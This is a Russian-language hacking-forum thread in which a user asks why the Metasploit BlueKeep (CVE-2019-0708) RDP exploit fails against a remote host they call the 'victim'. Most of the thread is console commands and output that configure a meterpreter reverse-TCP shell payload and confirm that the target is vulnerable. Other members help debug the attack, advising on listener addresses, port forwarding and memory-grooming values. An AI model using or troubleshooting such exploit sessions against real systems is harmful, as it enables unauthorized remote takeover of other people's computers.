PDA

Просмотр полной версии : Вопрос по метасплоит (CVE-2019-0708)


leikoz
21.03.2020, 00:18
Проблемма с использованиемCVE-2019-0708

msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp

PAYLOAD => windows/x64/meterpreter/reverse_tcp

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 1

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 200.000.100.28

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit


Exploiting target 200.000.100.28

Started reverse TCP handler on 192.168.1.114:4444

200.000.100.28:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check

[+] 200.000.100.28:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.

200.000.100.28:3389 - Scanned 1 of 1 hosts (100% complete)

Sending stage (206403 bytes) to 5.164.26.35

200.000.100.28:3389 - Surfing channels ...

200.000.100.28:3389 - Lobbing eggs ...

[-] 200.000.100.28:3389 - Exploit failed: NameError undefined local variable or method `rdp_move_mouse' for #

[SIZE="3"][COLOR="#b35900"]Может кто сталкивался, все перекопал не нашел похожей траблы.

3TON
21.03.2020, 06:53
Покажи вывод "options"

leikoz
21.03.2020, 14:28
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options

Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce):

Name Current Setting Required Description

---- --------------- -------- -----------

RDP_CLIENT_IP 192.168.0.100 yes The client IPv4 address to report during connect

RDP_CLIENT_NAME ethdev no The client computer name to report during connect, UNSET = random

RDP_DOMAIN no The client domain name to report during connect

RDP_USER no The username to report during connect, UNSET = random

RHOSTS 200.100.100.100 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'

RPORT 3389 yes The target port (TCP)

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)

LHOST 192.168.1.109 yes The listen address (an interface may be specified)

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit

Started reverse TCP handler on 192.168.1.109:4444

200.100.100.100:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check

[+] 200.100.100.100:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.

200.100.100.100:3389 - Scanned 1 of 1 hosts (100% complete)

Sending stage (206403 bytes) to [COLOR="#bfbfbf"][SIZE="1"]5.164.26.35

fandor9
21.03.2020, 14:36
[QUOTE="leikoz"]
leikoz said:
↑ (https://antichat.live/posts/4372242/)
Проблемма с использованием
CVE-2019-0708
Sending stage (206403 bytes) to
5.164.26.35
[COLOR="#ff0000"][SIZE="4"]

leikoz
21.03.2020, 20:53
fandor9 said:
↑ (https://antichat.live/posts/4372335/)
Вы порт 4444 пробрасываете на своём роутере? или как вы подключены к интернету? Я так понимаю RDP_CLIENT_IP должен быть вашим внешним адресом.


да порт проброшен, этот адресс "5.164.26.3" вообще не понятно откуда берется это не мой адресс и близко, бывают и другие, дело в том что там должен стоять ип жертвы тоесть " Sending stage (206403 bytes) to 200.000.100.28" должно быть

видео правильной работы

hibar1Xs
22.03.2020, 03:37
leikoz said:
↑ (https://antichat.live/posts/4372334/)
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options

Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce):

Name Current Setting Required Description

---- --------------- -------- -----------

RDP_CLIENT_IP 192.168.0.100 yes The client IPv4 address to report during connect

RDP_CLIENT_NAME ethdev no The client computer name to report during connect, UNSET = random

RDP_DOMAIN no The client domain name to report during connect

RDP_USER no The username to report during connect, UNSET = random

RHOSTS 200.100.100.100 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'

RPORT 3389 yes The target port (TCP)

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)

LHOST 192.168.1.109 yes The listen address (an interface may be specified)

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit

Started reverse TCP handler on 192.168.1.109:4444

200.100.100.100:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check

[+] 200.100.100.100:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.

200.100.100.100:3389 - Scanned 1 of 1 hosts (100% complete)

Sending stage (206403 bytes) to [COLOR="#bfbfbf"][SIZE="1"]5.164.26.35


LHOST Ваш внешний адрес.

LPORT Внешний порт.

Потом укажите локальный порт и адрес через ReverseListenerBindAddress и ReverseListenerBindPort.

Подробнее посмотреть: show advanced

leikoz
22.03.2020, 07:01
hibar1Xs said:
↑ (https://antichat.live/posts/4372539/)
LHOST
Ваш внешний адрес.
LPORT
Внешний порт.
Потом укажите локальный порт и адрес через
ReverseListenerBindAddress
и
ReverseListenerBindPort
.
Подробнее посмотреть:
show advanced


не помогло.. все тоже самое происходит, буду пробовать с другой машины

fandor9
22.03.2020, 13:40
leikoz said:
↑ (https://antichat.live/posts/4372546/)
не помогло.. все тоже самое происходит, буду пробовать с другой машины


может быть у вас не подходят адреса памяти (GROOMBASE) и размер памяти (GROOMSIZE), за счёт чего сплоит читает левый адрес памяти, где стоит всё что угодно, и берёт его как адрес. Тогда естественно сплоит летит мимо и падает. Тоесть вам надо подобрать правильный адрес и размер.